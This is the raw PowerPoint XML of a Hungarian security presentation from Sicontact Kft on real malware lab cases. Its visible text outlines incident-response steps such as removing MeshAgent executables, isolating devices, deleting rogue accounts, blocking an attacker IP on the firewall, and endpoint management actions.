Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87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113.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.sv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1.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId1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50.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg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19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51.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId10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34.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87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119.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.sv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59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87.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image121.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId1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121.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.sv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87.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId1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124.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId17" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp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68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1.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId22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2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31.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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76.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.sv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4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79.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId1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7D5EF3-9705-62D8-F176-983E9F579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gital image of a planet earth&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2B1A39-B499-647E-712F-A9BC8B7392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B8FE2DC-0450-D9EC-48E9-884124D18EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10881360" cy="10287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 sz="3918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EF069D18-D45C-0BF4-C560-2591CFD304D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="2087233"/>
            <a:ext cx="11627427" cy="221599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0" i="0" kern="1200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u-HU" sz="8000" b="1" dirty="0"/>
              <a:t>Megtörtént </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" b="1" dirty="0" err="1"/>
              <a:t>ESETek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" b="1" dirty="0"/>
              <a:t> a víruslaborból!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FBE731D2-DE19-8443-0F50-B4146E1CE84C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="7415441"/>
            <a:ext cx="7848600" cy="443198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None/>
              <a:defRPr sz="1800" b="0" i="0" kern="1200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None/>
              <a:defRPr sz="3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None/>
              <a:defRPr sz="3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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3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Font typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3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17F"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Béres Péter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IT vezető</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="3200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>, Sicontact Kft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white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34285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6DF79E-C0CF-89AB-1024-F4638EB6E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Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DB4096-7285-9868-D714-B241E89CFD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144721" y="-5037820"/>
            <a:ext cx="30087414" cy="18514850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09143DB8-5F60-5AEE-FCDC-44997580F96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849229" y="1284780"/>
            <a:ext cx="30560502" cy="18285230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{308619A4-7E4D-B0D0-6EF5-33C3EEAEBA6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220222" y="-16963399"/>
            <a:ext cx="42906647" cy="26403406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF19EC3-8ACC-A5B9-8908-B0486F33E3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14407705" y="-5577283"/>
            <a:ext cx="13607400" cy="8690365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A1F9A7C-96CC-D3DD-F008-9F4D5185DE7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-12354021" y="5703318"/>
            <a:ext cx="19335716" cy="13730680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D353D653-61A0-B693-BB4F-C4CB001ADC6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466018" y="851934"/>
            <a:ext cx="5358657" cy="838155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="187631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923"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="1862" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>anagement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4754" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Agent</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4754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EF22233A-8D88-BF7B-FFB6-AB2A08248A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824675" y="715922"/>
            <a:ext cx="888759" cy="88875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D1C108F-5165-586C-FA31-9D61AB33FA37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059075" y="2122935"/>
            <a:ext cx="12415559" cy="6465149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>- 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>MeshAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>és más futtatható 	állományok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>törésre kerültek</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0">
              <a:latin typeface="+mj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5400" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>- 	Érintett eszköz leválasztása a hálózatról</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="304815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0053368A-E3F4-76E5-64FF-B9F5B4731E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466018" y="5020729"/>
            <a:ext cx="8168458" cy="3635361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135860" tIns="67930" rIns="135860" bIns="67930" numCol="1" spcCol="540000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="152408" indent="-152408" algn="l" defTabSz="609630" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="12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1467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23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4815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Felhasználók letiltása/törlése</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609630" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="48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sys, system, system1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="304815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>kolása</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> a tűzfalon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609630" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="48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91[.]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="48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92.246.183</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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609630" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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304815" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc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905EF1F-1622-5ED4-F4A4-2D9A0D83A8E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13580353" y="2916991"/>
            <a:ext cx="3689914" cy="4302895"/>
            <a:chOff x="5295013" y="1531088"/>
            <a:chExt cx="6528391" cy="7612912"/>
          </a:xfrm>
          <a:effectLst>
            <a:outerShdw blurRad="281331" dist="707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6D68949-9E2F-FA09-C813-5F8CD266FD65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5295013" y="1531088"/>
              <a:ext cx="6528391" cy="6444512"/>
              <a:chOff x="5295013" y="1531088"/>
              <a:chExt cx="6528391" cy="6444512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B38637FC-48EC-ABCE-8A5B-8F25AE8AAE2E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5295013" y="1531088"/>
                <a:ext cx="6528391" cy="6444512"/>
                <a:chOff x="5295013" y="1531088"/>
                <a:chExt cx="6528391" cy="6444512"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="Triangle 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9679D6F7-895D-9B1B-AF87-9FD3F3B06FAF}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="10800000">
                  <a:off x="8322990" y="7676707"/>
                  <a:ext cx="491067" cy="298893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45" name="Rounded Rectangle 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB4820E0-D79D-E37D-6E14-8CA8A0B5E113}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5295013" y="1531088"/>
                  <a:ext cx="6528391" cy="6145619"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 1096"/>
                  </a:avLst>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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</p:grp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B0A61E1-745C-7349-3A4E-35A7F3E46972}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5660289" y="1679946"/>
                <a:ext cx="3314628" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Incident actions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EAED5D5-058A-CA39-E0C4-4C90E2150045}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="2583703"/>
                <a:ext cx="3625238" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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Isolate computers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6DF1296-63C9-E84A-7872-40EB6193128E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="3458445"/>
                <a:ext cx="4604948" cy="707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>
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr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End computer isolation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DA90B08-5B2E-508A-0562-D78CE0F7537E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="4674038"/>
                <a:ext cx="2789719" cy="707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Kill processes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A1784AE-C102-6229-AE6A-3DD1A33EFCED}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="5858532"/>
                <a:ext cx="3416388" cy="707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Block executable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27E1248-0059-020D-2A65-6CC2B0B54F50}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6574689" y="6751666"/>
                <a:ext cx="3938233" cy="707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Unblock executable</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="Graphic 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB0E28EF-1A46-4BA2-1C80-F4AF7D5D60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5782139" y="2645078"/>
                <a:ext cx="523582" cy="523582"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
